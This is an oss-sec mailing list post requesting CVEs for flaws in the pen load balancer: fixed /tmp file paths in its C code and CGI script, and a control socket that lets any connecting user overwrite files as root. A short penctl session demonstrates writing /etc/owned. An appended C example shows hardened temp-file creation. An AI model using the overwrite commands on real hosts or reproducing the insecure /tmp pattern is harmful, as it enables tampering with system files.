oss-sec mailing list archives
CVE-Request - pen issues
From: Steve Kemp <steve () steve org uk>
Date: Wed, 12 Mar 2014 20:47:48 +0000
There are some minor issues reported in the pen-load-balancer, which
could use CVE Identifiers:

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=741370

1. Insecure use of temporary files when requesting webstats:

        } else if (!strcmp(p, "status")) {
                p = webfile;
                webfile = "/tmp/webfile.html";
                webstats();
                ...

2. Insecure use of temporary files when invoking the penctl command
   in the supplied CGI script:

        PENCTL=penctl
        ...
        $PENCTL $SERVER:$PORT status 2> /tmp/penctl.cgi
        ..

3. When a control-socket is configured (via "-C ip:port" added to the
   pen command line) a user who can connect to that port can overwrite
   arbitrary files as the user pen is launched as:

        shelob ~ $ sudo pen 4444 localhost:9000 -C 127.0.0.1:5043
        shelob ~ $ penctl 127.0.0.1:5043 write /tmp/meow
        shelob ~ $ penctl 127.0.0.1:5043 write /etc/owned
        shelob ~ $ ls -l /etc/owned /tmp/meow
        -rw-r--r-- 1 root root 1187 Mar 11 18:35 /etc/owned
        -rw-r--r-- 1 root root 1186 Mar 11 18:35 /tmp/meow

Please feel free to ask for details if they can be helpful, versions
are unknown, but the current version is v0.18.0

Steve
--
http://www.steve.org.uk/
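Added example, not part of the original message and not pen's own code: a hardened way to create the kind of temporary file that items 1 and 2 describe, so that a file or symlink already present at the path cannot redirect the write. The function names and the "webstats" file name are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* If a fixed path must be used: O_EXCL makes open() fail with EEXIST
 * when anything (regular file or symlink) already exists there, and
 * O_NOFOLLOW refuses to follow a symlink. Mode 0600 keeps it private. */
int open_fixed_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: mkstemp() picks an unpredictable name and creates the file
 * atomically with mode 0600. tmpl must end in "XXXXXX" and is rewritten
 * with the chosen name. Returns 0 on success, -1 on error. */
int write_stats_tmp(char *tmpl, const char *data)
{
    size_t len = strlen(data);
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return -1;
    if (write(fd, data, len) != (ssize_t)len) {
        close(fd);
        unlink(tmpl);
        return -1;
    }
    return close(fd);
}

int main(void)
{
    char tmpl[] = "/tmp/webstats.XXXXXX";   /* constructed sample name */
    if (write_stats_tmp(tmpl, "<html>stats</html>\n") != 0) {
        perror("write_stats_tmp");
        return 1;
    }
    printf("wrote %s\n", tmpl);
    int fd = open_fixed_exclusive(tmpl);    /* path now exists: refused */
    printf("exclusive re-open: %s\n", fd < 0 ? strerror(errno) : "opened");
    if (fd >= 0) close(fd);
    unlink(tmpl);
    return 0;
}
```

For the shell case in item 2, `mktemp` gives a CGI script the same property as `mkstemp()` does here.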